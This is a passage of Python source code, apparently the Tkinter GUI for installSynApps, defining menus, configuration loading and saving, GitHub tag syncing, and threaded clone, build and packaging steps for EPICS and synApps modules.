self.binariesFlatToggle = tk.BooleanVar()
self.binariesFlatToggle.set(True)
menubar = Menu(self.master)
# File menu
filemenu = Menu(menubar, tearoff=0)
filemenu.add_command(label='New AD Config', command=lambda : self.newConfig('AD'))
filemenu.add_command(label='New Motor Config', command=lambda : self.newConfig('Motor'))
filemenu.add_command(label='New Full Config', command=lambda: self.newConfig('All'))
filemenu.add_command(label='Open', command=self.loadConfig)
filemenu.add_command(label='Save', command=self.saveConfig)
filemenu.add_command(label='Save As', command=self.saveConfigAs)
filemenu.add_command(label='Sync Tags', command=self.syncTags)
filemenu.add_command(label='Exit', command=self.close_cleanup)
menubar.add_cascade(label='File', menu=filemenu)
# Edit Menu
editmenu = Menu(menubar, tearoff=0)
editmenu.add_command(label='Edit Config', command=lambda : self.openEditWindow('edit_config'))
editmenu.add_command(label='Add New Module', command=lambda : self.openEditWindow('add_module'))
editmenu.add_command(label='Edit Individual Module', command=lambda : self.openEditWindow('edit_single_mod'))
editmenu.add_command(label='Edit Custom Build Scripts', command=lambda : self.openEditWindow('add_custom_build_script'))
editmenu.add_command(label='Edit Injection Files', command=lambda : self.openEditWindow('edit_injectors'))
editmenu.add_command(label='Edit Build Flags', command=lambda : self.openEditWindow('edit_build_flags'))
editmenu.add_command(label='Edit Make Core Count', command=self.editCoreCount)
editmenu.add_checkbutton(label='Toggle Popups', onvalue=True, offvalue=False, variable=self.showPopups)
editmenu.add_checkbutton(label='Toggle Single Core', onvalue=True, offvalue=False, variable=self.singleCore)
self.singleCore.trace('w', self.setSingleCore)
menubar.add_cascade(label='Edit', menu=editmenu)
# Debug Menu
debugmenu = Menu(menubar, tearoff = 0)
debugmenu.add_command(label='Print Loaded Config Info', command=self.printLoadedConfigInfo)
debugmenu.add_command(label='Clear Log', command=self.resetLog)
debugmenu.add_command(label='Recheck Dependencies', command=self.recheckDeps)
debugmenu.add_command(label='Print Path Information', command=self.printPathInfo)
debugmenu.add_checkbutton(label='Show Debug Messages', onvalue=True, offvalue=False, variable=self.showDebug)
debugmenu.add_checkbutton(label='Show Commands', onvalue=True, offvalue=False, variable=self.showCommands)
debugmenu.add_checkbutton(label='Auto-Generate Log File', onvalue=True, offvalue=False, variable=self.generateLogFile)
menubar.add_cascade(label='Debug', menu=debugmenu)
# Build Menu
buildmenu = Menu(menubar, tearoff=0)
buildmenu.add_command(label='Autorun', command=lambda : self.initBuildProcess('autorun'))
buildmenu.add_command(label='Run Dependency Script', command=lambda : self.initBuildProcess('install-dependencies'))
buildmenu.add_command(label='Clone Modules', command=lambda : self.initBuildProcess('clone'))
buildmenu.add_command(label='Update Config Files', command=lambda : self.initBuildProcess('update'))
buildmenu.add_command(label='Inject into Files', command=lambda : self.initBuildProcess('inject'))
buildmenu.add_command(label='Build Modules', command=lambda : self.initBuildProcess('build'))
buildmenu.add_command(label='Edit Dependency Script', command=lambda : self.openEditWindow('edit_dependency_script'))
buildmenu.add_checkbutton(label='Toggle Install Dependencies', onvalue=True, offvalue=False, variable=self.installDep)
menubar.add_cascade(label='Build', menu=buildmenu)
# Package Menu
packagemenu = Menu(menubar, tearoff=0)
packagemenu.add_command(label='Select Package Destination', command=self.selectPackageDestination)
packagemenu.add_command(label='Package Modules', command=lambda : self.initBuildProcess('package'))
packagemenu.add_command(label='Copy and Unpack', command=lambda : self.initBuildProcess('moveunpack'))
packagemenu.add_command(label='Set Output Package Name', command=self.setOutputPackageName)
packagemenu.add_checkbutton(label='Toggle Flat Binaries', onvalue=True, offvalue=False, variable=self.binariesFlatToggle)
menubar.add_cascade(label='Package', menu=packagemenu)
# InitIOCs Menu
iocmenu = Menu(menubar, tearoff=0)
iocmenu.add_command(label='Get initIOCs', command=self.getInitIOCs)
iocmenu.add_command(label='Launch initIOCs', command=self.launchInitIOCs)
menubar.add_cascade(label='IOCs', menu=iocmenu)
# Help Menu
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label='Quick Help', command=self.loadHelp)
helpmenu.add_command(label='Required dependencies', command=self.printDependencies)
helpmenu.add_command(label='installSynApps on Github', command=lambda : webbrowser.open("https://github.com/epicsNSLS2-deploy/installSynApps", new=2))
helpmenu.add_command(label='Report an issue', command=lambda : webbrowser.open("https://github.com/epicsNSLS2-deploy/installSynApps/issues", new=2))
helpmenu.add_command(label='Custom Build Script Help', command=self.depScriptHelp)
helpmenu.add_command(label='Online Documentation', command=lambda : webbrowser.open("https://epicsNSLS2-deploy.github.io/installSynApps", new=2))
helpmenu.add_command(label='About', command=self.showAbout)
menubar.add_cascade(label='Help', menu=helpmenu)
self.master.config(menu=menubar)
self.msg = "Welcome to installSynApps!"
# title label
self.topLabel = Label(frame, text = self.msg, width = '25', height = '1', relief = SUNKEN, borderwidth = 1, bg = 'blue', fg = 'white', font = self.largeFont)
self.topLabel.grid(row = 0, column = 0, padx = 10, pady = 10, columnspan = 2)
# Control buttons
self.loadButton = Button(frame, font=self.smallFont, text='Load Config', command=self.loadConfig, height='3', width='20')
self.cloneButton = Button(frame, font=self.smallFont, text='Clone Modules', command=lambda : self.initBuildProcess('clone'), height='3', width='20')
self.updateButton = Button(frame, font=self.smallFont, text='Update RELEASE', command=lambda : self.initBuildProcess('update'), height='3', width='20')
self.injectButton = Button(frame, font=self.smallFont, text='Inject Files', command=lambda : self.initBuildProcess('inject'), height='3', width='20')
self.buildButton = Button(frame, font=self.smallFont, text='Build Modules', command=lambda : self.initBuildProcess('build'), height='3', width='20')
self.autorunButton = Button(frame, font=self.smallFont, text='Autorun', command=lambda : self.initBuildProcess('autorun'), height='3', width='20')
self.packageButton = Button(frame, font=self.smallFont, text='Package', command=lambda : self.initBuildProcess('package'), height='3', width='20')
self.saveLog = Button(frame, font=self.smallFont, text='Save Log', command=self.saveLog, height='3', width='20')
self.loadButton.grid( row = 1, column = 0, padx = 15, pady = 15, columnspan = 1)
self.cloneButton.grid( row = 1, column = 1, padx = 15, pady = 15, columnspan = 1)
self.updateButton.grid( row = 2, column = 0, padx = 15, pady = 15, columnspan = 1)
self.injectButton.grid( row = 2, column = 1, padx = 15, pady = 15, columnspan = 1)
self.buildButton.grid( row = 3, column = 0, padx = 15, pady = 15, columnspan = 1)
self.autorunButton.grid(row = 3, column = 1, padx = 15, pady = 15, columnspan = 1)
self.packageButton.grid(row = 4, column = 0, padx = 15, pady = 15, columnspan = 1)
self.saveLog.grid( row = 4, column = 1, padx = 15, pady = 15, columnspan = 1)
# Log and loading label
#self.logLabel = Label(frame, text = 'Log', font = self.smallFont, height = '1').grid(row = 0, column = 6, pady = 0, columnspan = 1)
self.logButton = Button(frame, text='Clear Log', font=self.smallFont, height='1', command=self.resetLog).grid(row = 0, column = 7, pady = 0, columnspan = 1)
self.loadingLabel = Label(frame, text = 'Process Thread Status: Done.', anchor=W, font=self.smallFont, height = '1')
self.loadingLabel.grid(row = 0, column = 2, pady = 0, columnspan = 2)
# config panel
self.configPanel = ScrolledText.ScrolledText(frame, width = '50', height = '20')
self.configPanel.grid(row = 5, column = 0, padx = 15, pady = 15, columnspan = 2, rowspan = 2)
# log panel + initialize text
self.log = ScrolledText.ScrolledText(frame, height = '40', width = '70')
self.log.grid(row = 1, column = 2, padx = 15, pady = 15, columnspan = 6, rowspan = 6)
self.writeToLog(self.initLogText())
# default configure path
self.configure_path = 'configure'
self.configure_path = os.path.abspath(self.configure_path)
self.valid_install = False
self.deps_found = True
self.install_loaded = False
self.metacontroller = ViewModel.meta_pref_control.MetaDataController()
if 'configure_path' in self.metacontroller.metadata.keys():
self.configure_path = self.metacontroller.metadata['configure_path']
if self.configure_path != 'configure':
self.install_loaded = True
self.writeToLog('Loading configure directory saved in location {}\n'.format(self.configure_path))
self.metacontroller.metadata['isa_version'] = installSynApps.__version__
self.metacontroller.metadata['platform'] = platform
self.metacontroller.metadata['last_used'] = '{}'.format(datetime.datetime.now())
# installSynApps options, initialize + read default configure files
self.parser = IO.config_parser.ConfigParser(self.configure_path)
self.install_config, message = self.parser.parse_install_config(allow_illegal=True)
if message is not None:
self.valid_install = False
self.showWarningMessage('Warning', 'Illegal Install Config: {}'.format(message), force_popup=True)
else:
self.valid_install = True
# Threads for async operation
self.thread = threading.Thread()
self.loadingIconThread = threading.Thread()
# installSynApps drivers
self.writer = IO.config_writer.ConfigWriter(self.install_config)
self.cloner = Driver.clone_driver.CloneDriver(self.install_config)
self.updater = Driver.update_config_driver.UpdateConfigDriver(self.configure_path, self.install_config)
self.builder = Driver.build_driver.BuildDriver(self.install_config, 0)
self.packager = Driver.packager_driver.Packager(self.install_config)
if 'package_location' in self.metacontroller.metadata.keys():
self.packager.output_location = self.metacontroller.metadata['package_location']
self.writeToLog('Loaded package output location: {}\n'.format(self.packager.output_location))
self.package_output_filename = None
if 'package_output_filename' in self.metacontroller.metadata.keys():
self.package_output_filename = self.metacontroller.metadata['package_output_filename']
self.autogenerator = IO.script_generator.ScriptGenerator(self.install_config)
self.recheckDeps()
if self.install_config is not None:
self.updateConfigPanel()
else:
self.showErrorMessage('Load error', 'Error loading default install config... {}'.format(message), force_popup=True)
# -------------------------- Helper functions ----------------------------------
def loadingLoop(self):
"""
Simple function for playing animation when main process thread is executing
"""
icons = ['\\', '|', '/', '-']
icon_counter = 0
while self.thread.is_alive():
self.loadingLabel.config(text = 'Process Thread Status: {}'.format(icons[icon_counter]))
time.sleep(0.25)
icon_counter = icon_counter + 1
if icon_counter == len(icons):
icon_counter = 0
self.loadingLabel.config(text = 'Process Thread Status: Done.')
def initLogText(self):
"""Function that initializes log text
"""
return installSynApps.get_welcome_text() + '\n'
def resetLog(self):
""" Function that resets the log """
self.log.delete('1.0', END)
self.writeToLog(self.initLogText())
def updateConfigPanel(self):
"""
Function that refreshes the config panel contents if a new InstallConfiguration is loaded
"""
self.configPanel.delete('1.0', END)
self.writeToLog("Writing Install Configuration to info panel...\n")
if self.install_config is not None:
self.writeToConfigPanel("Currently Loaded Install Configuration:\n\n")
self.writeToConfigPanel("Install Location: {}\n\n".format(self.install_config.install_location))
self.writeToConfigPanel("Modules to auto-build:\n-------------------------------\n")
for module in self.install_config.get_module_list():
if module.build == "YES":
self.writeToConfigPanel("Name: {},\t\t\tVersion: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules with detected custom build scripts:\n----------------------------\n")
for module in self.install_config.get_module_list():
if module.custom_build_script_path is not None:
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules to clone but not build:\n----------------------------\n")
for module in self.install_config.get_module_list():
if module.build == "NO" and module.clone == "YES":
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToConfigPanel("\nModules to package:\n-----------------------------\n")
for module in self.install_config.get_module_list():
if module.package == "YES":
self.writeToConfigPanel("Name: {},\t\t\t Version: {}\n".format(module.name, module.version))
self.writeToLog("Done.\n")
else:
self.showErrorMessage("Config Error", "ERROR - Could not display Install Configuration: not loaded correctly")
def updateAllRefs(self, install_config):
""" Function that updates all references to install config and configure path """
self.install_config = install_config
self.writer.install_config = self.install_config
self.cloner.install_config = self.install_config
self.updater.install_config = self.install_config
self.updater.path_to_configure = self.configure_path
self.updater.config_injector.install_config = self.install_config
self.builder.install_config = self.install_config
self.packager.install_config = self.install_config
self.autogenerator.install_config = self.install_config
def recheckDeps(self):
""" Wrapper function for checking for installed dependancies """
self.writeToLog('Checking for installed dependancies...\n')
inPath, missing = self.builder.check_dependencies_in_path()
if not inPath:
self.showErrorMessage('Error', 'ERROR- Could not find {} in system path.'.format(missing), force_popup=True)
self.deps_found = False
else:
self.deps_found = True
if not self.packager.found_distro:
self.writeToLog('Distro python package not found.\nTarball names will be generic and not distribution specific.\n')
self.writeToLog('To install distro, use pip: pip install distro\n')
self.writeToLog('Done.\n')
def close_cleanup(self):
""" Function that asks user if he/she wants to close, and cleans up threads """
if self.thread.is_alive():
self.showWarningMessage('Warning', 'Quitting while a process is running may result in an invalid installation!', force_popup=True)
if messagebox.askokcancel('Quit', 'Do you want to quit?'):
self.master.destroy()
IO.logger.close_logger()
self.metacontroller.save_metadata()
# -------------------------- Functions for writing/displaying information ----------------------------------
def writeToLog(self, text):
""" Function that writes to log """
self.log.insert(INSERT, text)
self.log.see(END)
def writeToConfigPanel(self, text):
""" Function that writes to the config panel """
self.configPanel.insert(INSERT, text)
def showErrorMessage(self, title, text, force_popup = False):
""" Function that displays error popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showerror(title, text)
self.writeToLog(text + "\n")
def showWarningMessage(self, title, text, force_popup = False):
""" Function that displays warning popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showwarning(title, text)
self.writeToLog(text + "\n")
def showMessage(self, title, text, force_popup = False):
""" Function that displays info popup and log message """
if self.showPopups.get() or force_popup:
messagebox.showinfo(title, text)
self.writeToLog(text + '\n')
# ----------------------- Version Sync Functions -----------------------------
def syncTags(self):
""" Function that automatically updates all of the github tags for the install configuration git modules """
global WITH_PYGITHUB
if not WITH_PYGITHUB:
self.showErrorMessage('Error', 'ERROR - PyGithub not found. Install with pip install pygithub, and restart', force_popup=True)
else:
user = simpledialog.askstring('Please enter your github username.', 'Username')
if user is None or len(user) == 0:
return
passwd = simpledialog.askstring('Please enter your github password.', 'Password', show='*')
if passwd is None or len(passwd) == 0:
return
if user is not None and passwd is not None:
if not self.thread.is_alive():
self.thread = threading.Thread(target=lambda : self.syncTagsProcess(user, passwd))
self.loadingIconThread = threading.Thread(target=self.loadingLoop)
self.thread.start()
self.loadingIconThread.start()
else:
self.showErrorMessage('Error', 'ERROR - Process thread already running', force_popup=True)
def syncTagsProcess(self, user, passwd):
"""
Function meant to synchronize tags for each github based module.
Parameters
----------
user : str
github username
passwd : str
github password
"""
installSynApps.sync_github_tags(user, passwd, self.install_config)
self.updateAllRefs(self.install_config)
self.updateConfigPanel()
# ----------------------- Loading/saving Functions -----------------------------
def newConfig(self, template_type):
"""
Will load a new blank config and allow user to edit/save it
"""
template_filename = 'NEW_CONFIG_ALL'
if template_type == 'AD':
template_filename = 'NEW_CONFIG_AD'
elif template_type == 'Motor':
template_filename = 'NEW_CONFIG_MOTOR'
self.writeToLog("Opening new install config dialog...\n")
temp = simpledialog.askstring('New Install Config', 'Please enter a new desired install location.', parent = self.master)
if temp is None:
self.showWarningMessage('Warning', 'Operation cancelled')
else:
self.writeToLog("Trying to load new default config with install location {}...\n".format(temp))
old_config = self.configure_path
self.configure_path = 'resources'
self.parser.configure_path = self.configure_path
loaded_install_config, message = self.parser.parse_install_config(config_filename=template_filename, force_location=temp, allow_illegal=True)
if message is not None:
self.valid_install = False
else:
self.valid_install = True
if loaded_install_config is None:
self.showErrorMessage('Error', 'ERROR - {}.'.format(message), force_popup=True)
self.parser.configure_path = old_config
self.configure_path = old_config
elif not self.valid_install:
self.showWarningMessage('Warning', 'WARNING - {}.'.format(message), force_popup=True)
self.updateAllRefs(loaded_install_config)
self.updateConfigPanel()
else:
self.updateAllRefs(loaded_install_config)
self.updateConfigPanel()
self.install_loaded = False
def loadConfig(self):
"""
Function that opens file dialog asking for configure directory,
then if it is valid, loads it into an InstallConfiguration object,
and updates the config panel.
"""
self.writeToLog("Opening load install config file dialog...\n")
temp = self.configure_path
self.configure_path = filedialog.askdirectory(initialdir = '.')
if len(self.configure_path) == 0:
self.writeToLog('Operation cancelled.\n')
self.configure_path = temp
return
valid = True
if not os.path.exists(self.configure_path + "/INSTALL_CONFIG"):
valid = False
self.showErrorMessage("Config Error", "ERROR - No INSTALL_CONFIG file found in selected directory.")
elif not os.path.exists(self.configure_path + "/injectionFiles") or not os.path.exists(self.configure_path + "/macroFiles"):
self.showWarningMessage('Load Warning', "WARNING - Could not find injection files or macro files.")
if not valid:
self.configure_path = temp
return
self.writeToLog('Loaded configure directory at {}.\n'.format(self.configure_path))
self.parser.configure_path = self.configure_path
self.metacontroller.metadata['configure_path'] = self.configure_path
self.install_config, message = self.parser.parse_install_config(allow_illegal=True)
if message is not None:
self.valid_install = False
self.showWarningMessage('Warning', 'WARNING - {}.'.format(message), force_popup=True)
else:
self.valid_install = True
if self.install_config is not None:
self.updateConfigPanel()
else:
self.showErrorMessage('Load error', 'Error loading install config... {}'.format(message), force_popup=True)
self.updateAllRefs(self.install_config)
self.install_loaded = True
if self.configure_path == 'configure':
self.install_loaded = False
def saveConfig(self):
""" Function that saves an existing config, or opens save as if it was not previously saved. """
self.writeToLog("Saving...\n")
if not self.install_loaded:
self.saveConfigAs()
else:
self.saveConfigAs(force_loc = self.configure_path)
def saveConfigAs(self, force_loc = None):
""" Function that opens a save as Dialog for saving currently loaded confguration """
if self.install_config is None:
self.showErrorMessage('Save error', 'No loaded install config to save.', force_popup=True)
return
if force_loc is None:
dirpath = filedialog.asksaveasfilename(initialdir = '.')
if len(dirpath) < 1:
self.writeToLog('Operation Cancelled.\n')
return
self.writeToLog('Creating save directory...\n')
else:
ans = messagebox.askyesno('Confirm', 'Do you wish to overwrite existing install config with new changes?')
if ans is None:
return
elif not ans:
return
dirpath = force_loc
shutil.rmtree(os.path.join(dirpath, 'injectionFiles'))
shutil.rmtree(os.path.join(dirpath, 'macroFiles'))
os.remove(os.path.join(dirpath, 'INSTALL_CONFIG'))
wrote, message = self.writer.write_install_config(filepath=dirpath)
if not wrote:
self.showErrorMessage('Write Error', 'Error saving install config: {}'.format(message), force_popup=True)
else:
if self.install_loaded:
try:
shutil.copytree(self.configure_path + '/customBuildScripts', dirpath + '/customBuildScripts')
except:
pass
self.configure_path = dirpath
self.install_loaded = True
self.updateAllRefs(self.install_config)
self.metacontroller.metadata['configure_path'] = self.configure_path
self.writeToLog('Saved currently loaded install configuration to {}.\n'.format(dirpath))
def saveLog(self, saveDir = None):
"""
Function that saves the contents of the log to a file.
Parameters
----------
saveDir = None
if None, opens file dialog to select save location, otherwise, saves in saveDir passed in
"""
location = saveDir
if location == None:
location = filedialog.askdirectory(initialdir = '.')
if len(location) == 0:
return
if location is not None and not os.path.exists(location):
self.showErrorMessage('Save Error', 'ERROR - Save directory does not exist')
return
time = datetime.datetime.now()
log_file = open(location + "/installSynApps_log_" + time.strftime("%Y_%m_%d_%H_%M_%S"), "w")
log_file.write(self.log.get('1.0', END))
log_file.close()
def selectPackageDestination(self):
""" Function that asks the user to select an output destination for the created tarball """
package_output = filedialog.askdirectory(initialdir = '.', title = 'Select output package directory')
if len(package_output) < 1:
self.writeToLog('Operation Cancelled.\n')
else:
if os.path.exists(package_output):
self.packager.output_location = package_output
self.metacontroller.metadata['package_location'] = self.packager.output_location
self.writeToLog('New package output location set to: {}\n'.format(package_output))
else:
self.showErrorMessage('Path Error', 'ERROR - Output path does not exist.')
def setOutputPackageName(self):
""" Function that sets the output package name """
self.writeToLog('Setting output package name...\n')
package_name = simpledialog.askstring('Enter an output name', 'Output Package Name - typically OS/Distro.')
if package_name is not None and len(package_name) > 0:
self.packager.OS = package_name
self.writeToLog('Done.\n')
else:
self.writeToLog('Operation Cancelled.\n')
def getInitIOCs(self):
""" Function that gets initIOCs from github. """
self.writeToLog('Fetching the initIOC script...\n')
out = subprocess.Popen(['git', 'clone', 'https://github.com/epicsNSLS2-deploy/initIOC'])
self.writeToLog('Done.\n')
def launchInitIOCs(self):
""" Function that launches the GUI version of initIOCs """
if os.path.exists('./initIOC/initIOCs.py'):
self.writeToLog('Launching initIOC GUI...\n')
current = os.getcwd()
os.chdir('initIOC')
if platform == 'win32':
p = subprocess.Popen(['py', 'initIOCs.py', '-g'])
else:
p = subprocess.Popen(['./initIOCs.py', '-g'])
os.chdir(current)
self.writeToLog('Done.\n')
else:
self.showErrorMessage('Error', 'ERROR - Could not find initIOCs. Run the Get initIOCs command first.')
#---------------------------- Editing Functions --------------------------------
def openEditWindow(self, edit_window_str):
""" Function that opens up an Edit Config window """
window = None
if self.install_config is None:
self.showErrorMessage('Edit Error', 'Error - no loaded install config', force_popup=True)
return
if edit_window_str == 'edit_config':
window = ViewModel.edit_install_screen.EditConfigGUI(self, self.install_config)
elif edit_window_str == 'add_module':
window = ViewModel.add_module_screen.AddModuleGUI(self, self.install_config)
elif edit_window_str == 'edit_single_mod':
window = ViewModel.edit_individual_module.EditSingleModuleGUI(self, self.install_config)
elif edit_window_str == 'edit_injectors':
window = ViewModel.edit_injector_screen.EditInjectorGUI(self, self.install_config)
elif edit_window_str == 'edit_build_flags':
window = ViewModel.edit_macro_screen.EditMacroGUI(self, self.install_config)
elif edit_window_str == 'add_custom_build_script':
window = ViewModel.add_custom_build_screen.AddCustomBuildScriptGUI(self, self.install_config)
elif edit_window_str == 'edit_dependency_script':
window = ViewModel.edit_dependency_script.EditDependencyScriptGUI(self, self.install_config)
else:
self.showErrorMessage('Open Error', 'ERROR - Illegal Edit Window selection')
if window is None:
self.showErrorMessage('Open Error', 'ERROR - Unable to open Edit Window')
def editCoreCount(self):
""" Function that prompts the user to enter a core count """
if self.singleCore.get():
self.showMessage('Message', 'Currently single core mode is enabled, please toggle off to set core count', force_popup=True)
return
cores = simpledialog.askinteger('Set Core Count', 'Please enter a core count, or 0 to use all cores', parent = self.master)
if cores is None:
self.writeToLog('Operation Cancelled.\n')
return
if cores < 0 or cores > 16:
self.showErrorMessage('Core Count Error', 'ERROR - You have entered an illegal core count, try again.', force_popup=True)
return
current_count = self.builder.threads
new_count = cores
if self.builder.threads == 0:
current_count = 'Max core count'
if cores == 0:
new_count = 'Max core count'
self.writeToLog('New core count to use: {}, old core count to use: {}\n'.format(new_count, current_count))
self.builder.threads = cores
def setSingleCore(self, *args):
""" Function that sets the single core option if toggle is pressed """
self.builder.one_thread = self.singleCore.get()
#--------------------------------- Help/Documentation Functions -----------------------------
def loadHelp(self):
""" Simple function that displays a help message """
helpMessage = "---------------------------------------------\n"
helpMessage = helpMessage + "Welcome to the installSynApps GUI.\nThis program is designed to help you rapidly build EPICS and synApps.\n\n"
helpMessage = helpMessage + "To begin, take a look at the panel on the bottom left.\nThis is the currently loaded install configuration.\n"
helpMessage = helpMessage + "Note the modules listed to be auto-built and their versions.\n\nTo edit these, check the Edit -> Edit Config tab in the menubar.\n"
helpMessage = helpMessage + "A second window should open and allow you to edit the version\nof each module, as well as to select modules to clone/build/package.\n"
helpMessage = helpMessage + "This window also allows you to edit the install location.\n\n"
helpMessage = helpMessage + "Once you have edited the configuration to your specifications,\nyou may press the autorun button on the side, to trigger the build.\n"
helpMessage = helpMessage + "For more detailed documentation on installSynApps, please\nvisit the documentation online."
self.showMessage("Help", helpMessage)
def printDependencies(self):
""" Prints some information regarding required dependencies for installSynApps """
self.writeToLog('---------------------------------------------------\n')
self.writeToLog('Dependencies required for installSynApps:\n')
self.writeToLog(' * git\n * wget\n * tar\n * make\n * perl\n\n')
self.writeToLog('Also required are a C/C++ compiler:\n')
self.writeToLog(' * Linux - gcc/g++ (install with package manager)\n')
self.writeToLog(' * Windows - MSVC/MSVC++ (install with Visual Studio 2015+)\n\n')
self.writeToLog('Additional optional python3 modules used, install with pip:\n')
self.writeToLog(' * distro\n')
self.writeToLog(' * pygithub\n\n')
self.writeToLog('All dependencies must be in system path during build time.\n')
self.writeToLog('---------------------------------------------------\n')
def showAbout(self):
""" Simple function that shows about message """
self.showMessage('About', self.initLogText())
def printLoadedConfigInfo(self):
""" Simple function that prints all info about a loaded configuration """
if self.install_config is None:
self.showErrorMessage('Error', 'ERROR - No loaded install config found', force_popup=True)
return
self.writeToLog(self.install_config.get_printable_string())
def depScriptHelp(self):
""" Function that displays help message for adding dependancy script """
self.writeToLog('Use the Edit -> Edit Custom Build Scripts menu to add/remove\n')
self.writeToLog('custom build scripts for each module.\nOn Windows they will be saved as ')
self.writeToLog('.bat files, on Linux as .sh files,\nand they will be run from the module')
self.writeToLog(' root directory.\nIf no custom script is found, the module will just be\n')
self.writeToLog('built with make. If you have a sudo call in your script,\nnote that you ')
self.writeToLog('will need to enter it in the terminal to proceed.\n')
def printPathInfo(self):
""" Function that prints a series of paths that are currently loaded. """
self.writeToLog('-----------------------------------------\n')
self.writeToLog('Install Location: {}\n'.format(self.install_config.install_location))
self.writeToLog('Install config directory: {}\n'.format(self.configure_path))
self.writeToLog('Package output path: {}\n'.format(self.packager.output_location))
#--------------------------------- Build Process Functions ------------------------------------------#
# #
# Note that each of the build process functions has a wrapper that quickly returns, after starting #
# thread for running the process itself in the background. #
#----------------------------------------------------------------------------------------------------#
def initBuildProcess(self, action):
"""Event function that starts a thread on the appropriate build process function
Parameters
----------
action : str
a string key on the async action to perform
"""
if self.generateLogFile.get() and IO.logger._LOG_FILE is None:
IO.logger.initialize_logger()
if self.showCommands.get() != IO.logger._PRINT_COMMANDS:
IO.logger.toggle_command_printing()
if self.showDebug.get() != IO.logger._DEBUG:
IO.logger.toggle_debug_logging()
if self.install_config is None:
self.showErrorMessage("Start Error", "ERROR - No loaded install config.", force_popup=True)
elif not self.valid_install:
self.showErrorMessage("Start Error", "ERROR - Loaded install config not valid.", force_popup=True)
elif not self.deps_found:
self.showErrorMessage("Start Error", "ERROR - Missing dependancies detected. See Help -> Required Dependencies.", force_popup=True)
elif not self.thread.is_alive():
if action == 'autorun':
self.thread = threading.Thread(target=self.autorunProcess)
elif action == 'install-dependencies':
self.thread = threading.Thread(target=self.installDependenciesProcess)
elif action == 'clone':
self.thread = threading.Thread(target=self.cloneConfigProcess)
elif action == 'update':
self.thread = threading.Thread(target=self.updateConfigProcess)
elif action == 'inject':
self.thread = threading.Thread(target=self.injectFilesProcess)
elif action == 'build':
self.thread = threading.Thread(target=self.buildConfigProcess)
elif action == 'package':
self.thread = threading.Thread(target=self.packageConfigProcess)
elif action == 'moveunpack':
self.thread = threading.Thread(target=self.copyAndUnpackProcess)
else:
self.showErrorMessage('Start Error', 'ERROR - Illegal init process call', force_popup=True)
self.loadingIconThread = threading.Thread(target=self.loadingLoop)
self.thread.start()
self.loadingIconThread.start()
else:
self.showErrorMessage("Start Error", "ERROR - Process thread is already active.")
def installDependenciesProcess(self):
""" Function that calls a dependency script if required """
self.writeToLog('Running dependency script...\n')
if platform == 'win32':
if os.path.exists(self.configure_path + '/dependencyInstall.bat'):
self.builder.acquire_dependecies(self.configure_path + '/dependencyInstall.bat')
else:
self.writeToLog('No dependency script found.\n')
else:
if os.path.exists(self.configure_path + '/dependencyInstall.sh'):
self.builder.acquire_dependecies(self.configure_path + '/dependencyInstall.sh')
else:
self.writeToLog('No dependency script found.\n')
self.writeToLog('Done.\n')
def cloneConfigProcess(self):
""" Function that clones all specified modules """
failed = self.cloner.clone_and_checkout()
if len(failed) > 0:
for elem in failed:
self.writeToLog('Module {} was not cloned successfully.\n'.format(elem))
return -1
return 0
def updateConfigProcess(self):
""" Function that updates RELEASE and configuration files """
self.writeToLog('----------------------------\n')
self.writeToLog('Updating all RELEASE and configuration files...\n')
self.updater.run_update_config(with_injection=False)
dep_errors = self.updater.perform_dependency_valid_check()
for error in dep_errors:
self.writeToLog('{}\n'.format(error))
self.writeToLog('Reordering module build order to account for intra-module dependencies...\n')
self.updater.perform_fix_out_of_order_dependencies()
self.writeToLog('Done.\n')
return 0
def injectFilesProcess(self):
""" Function that injects settings into configuration files """
self.writeToLog('Starting file injection process.\n')
self.updater.perform_injection_updates()
self.writeToLog('Done.\n')
return 0
def buildConfigProcess(self):
""" Function that builds all specified modules """
status = 0
self.writeToLog('-----------------------------------\n')
self.writeToLog('Beginning build process...\n')
status, failed = self.builder.build_all()
if status != 0:
for module in failed:
self.writeToLog('Failed building module {}\n'.format(module))
self.showErrorMessage('Build Error', 'Some modules failed to build.')
else:
self.writeToLog('Auto-Build completed successfully.\n')
self.writeToLog('Done.\n')
self.writeToLog('Autogenerating install/uninstall scripts...\n')
self.autogenerator.initialize_dir()
self.autogenerator.generate_install()
self.autogenerator.generate_uninstall()
self.writeToLog('Autogenerating README file in {}...\n'.format(self.install_config.install_location))
self.autogenerator.generate_readme()
self.writeToLog('Done.\n')
return status
def autorunProcess(self):
""" Function that performs all other processes sequentially """
self.showMessage('Start Autorun', 'Start Autorun - Deps -> Clone -> Checkout -> Update -> Build -> Generate')
if self.installDep.get():
self.installDependenciesProcess()
else:
self.writeToLog("Auto install dependencies toggled off.\n")
current_status = self.cloneConfigProcess()
if current_status < 0:
self.showErrorMessage('Clone Error', 'ERROR - Cloning error occurred, aborting...')
else:
current_status = self.updateConfigProcess()
if current_status < 0:
self.showErrorMessage('Update Error', 'ERROR - Update error occurred, aborting...')
else:
current_status = self.injectFilesProcess()
if current_status < 0:
self.showErrorMessage('File Inject Error', 'ERROR - Unable to inject files, check Permissions...')
else:
current_status = self.buildConfigProcess()
if current_status < 0:
self.showErrorMessage('Build Error', 'ERROR - Build error occurred, aborting...')
self.showMessage('Alert', 'You may wish to save a copy of this log file for later use.')
self.writeToLog('To generate a bundle from the build, select the Package option.\n')
self.writeToLog('Autorun completed.\n')
def packageConfigProcess(self):
""" Function that packages the specified modules into a tarball """
self.writeToLog('Starting packaging...\n')
self.package_output_filename = self.packager.create_bundle_name()
output = self.packager.create_package(self.package_output_filename, flat_format=self.binariesFlatToggle.get())
self.package_output_filename = self.package_output_filename + '.tgz'
self.metacontroller.metadata['package_output_filename'] = self.package_output_filename
if output != 0:
self.showErrorMessage('Package Error', 'ERROR - Was unable to package areaDetector successfully. Aborting.', force_popup=True)
else:
self.writeToLog('Done.\n')
def copyAndUnpackProcess(self):
""" Function that allows user to move their packaged tarball and unpack it. """
self.writeToLog('Starting move + unpack operation...\n')
if self.package_output_filename is None:
self.showErrorMessage('Error', 'ERROR - No tarball package has yet been created.')
elif not os.path.exists(self.packager.output_location + '/' + self.package_output_filename):
self.showErrorMessage('Error', 'ERROR - tarball was generated but could not be found. Possibly moved.')
else:
target = filedialog.askdirectory(initialdir='.')
